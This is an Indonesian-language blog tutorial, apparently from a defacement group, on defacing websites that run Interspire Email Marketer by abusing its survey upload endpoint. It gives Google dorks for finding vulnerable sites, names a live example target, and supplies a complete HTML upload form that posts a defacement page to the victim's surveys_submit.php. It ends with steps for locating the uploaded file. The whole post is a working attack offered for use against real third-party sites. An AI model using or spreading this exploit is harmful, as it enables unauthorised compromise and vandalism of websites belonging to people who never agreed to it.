Kali ini saya akan ngasih materi/tutorial deface proof interspire email marketer to rce
Bahan bahan:
- SC deface extensi .html kalo gw pake nama index.html biar directory nya ke index:v
- tools buat execution rce(gw taroh di bawah)
- Exploit: /admin/temp/surveys
/Patch/admin/temp/surveys
Okey langsung saja ke step by step
1.kalian dorking dulu, usahakan dorking di google image
Dork: intext:"admin/temp/surveys"
Intext:"powered by hairyspire email marketer 6.1.4"
2: jika sudah Nemu website kasih Exploit
Live target+contoh: https://release.test.ppt001.com/admin/temp/surveys/
Nah jika sudah maka akan muncul directory seperti ini
Lanjut ke execution pake tools
Untuk tools nya copy di bawah ini
<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>INDONESIAN FIGHTER CYBER</title>
</head>
<body>
<form action="https://ISI DENGAN WEBSITE YANG KALIAN DORKING/surveys_submit.php?formId=MASUKIN ANGKA YANG DI DIR" method="post" enctype="multipart/form-data">
<input type="file" name="widget[0][field][][value]">
<input type="submit" value="submit" name="submit">
</form>
</body>
</html>
JIKA SUDAH SAVE ITU TOOLS DENGAN EXTENSI .HTML
Kalian buka toolsnya di google maka tampilannya seperti uploader, kalian upload SC deface kalian jika berhasil akan blank putih
Cara manggil nya gimana bang?
Gini cara panggil SC kita, kita kembali ke directory tersebut, klik angka yang kalian pilih, karena gw pilih angka 1337 maka aku klik angka 1337
Nah sudah akan muncul angka baru lagi, SC kalian terletak di angka paling bawah
Klik and boom
Kedeface:)
Post a Comment (0)